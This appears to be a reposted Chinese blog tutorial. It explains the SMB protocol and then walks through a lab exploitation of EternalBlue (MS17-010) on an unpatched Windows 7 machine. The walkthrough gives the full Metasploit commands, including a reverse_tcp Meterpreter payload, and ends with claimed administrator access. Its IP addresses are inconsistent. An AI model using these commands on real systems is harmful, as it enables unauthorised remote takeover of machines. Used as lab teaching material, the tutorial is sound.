SMB协议与永恒之蓝漏洞利用

一,SMB服务

  1. SMB(全称为Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机,串口等,电脑上的网上邻居就是靠他实现的;

  2. SMB是一个应用层协议,可以工作在NETBIOS协议之上(TCP/139)或者TCP协议(TCP/445)之上;

  3. SMB协议和NETBIOS协议在Windows主机默认安装;

  4. SMB版本最新的是3.X,win7和vista是2.X。winXP是1.0主要的漏洞是由新版本的操作系统保持向下兼容带来,也就是说win10主机和winXP主机通过网络共享文件用的是SMB1.0协议;

  5. SMB是一种客户机/服务器,请求/响应协议。通过SMB协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求;

  6. SMB工作过程:版本协商——>客户端连接服务器认证——>客户端访问资源鉴定——>对共享资源进行操作;

  7. 微软官方文档[MS-SMB2]里提到SMBv2和SMBv3可统称为SMB 2协议,所以在Wireshark以及其他工具中便将高于smb2.0之后的协议统一为smb2。如果设备间使用了smbv3中新特性RDMA功能的则显示为SMBDirect协议;

  8. 配置SMB服务就是启动网络发现和打印机共享(如果网络设备为公用默认不开启时,则需要手动开启);

  9. 如果在Windows和Windows server中检测,启动和禁止SMBv1、SMB
    v2和SMBv3请参考微软官方指南:
    https://support.microsoft.com/zh-cn/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and

  10. 利用kali可对著名的SMB漏洞——永恒之蓝,进行检测和利用;
    https://blog.csdn.net/qq_36374896/article/details/81806764

  11. kali虚拟机镜像下载免费安装(免安装):
    VM Homepage: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

SMB——永恒之蓝漏洞利用

一,实验环境

攻击机:kali
被攻击机:win7(未装补丁)或者Windows2008(于win7的步骤相同)

二,实验步骤

1、获取IP地址(通过ifconfig和ipconfig命令)

  • kali-linux:192.168.139.139
  • Windows7:192.168.139.2
    在这里插入图片描述
    在这里插入图片描述
    2、通过“控制面板”——>“网络和Internet”——>“网络和共享中心”——>“更改高级共享设置”:启动打印机共享

在这里插入图片描述

3、kali-Linux输入msfconsole启动msf(若不是root登录,需sudo提升权限)

命令:root@kali:~# msfconsole

在这里插入图片描述命令提示,显示msf启动成功

4、使用永恒之蓝漏洞

msf > use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
5、设置TCP连接

msf exploit (windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述6,设置靶机IP和操作机IP
操作机kali-Linux的——IP地址:192.168.139.139

靶机Windows7的——IP地址:192.168.139.129

msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 192.168.18.130 msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.18.129

在这里插入图片描述

7、进行攻击

msf exploit (windows/smb/ms17_010_eternalblue) > run

在这里插入图片描述
8、进行测试:

在这里插入图片描述

已获得Windows管理员权限!

猜你喜欢

转载自blog.csdn.net/weixin_45116657/article/details/92009466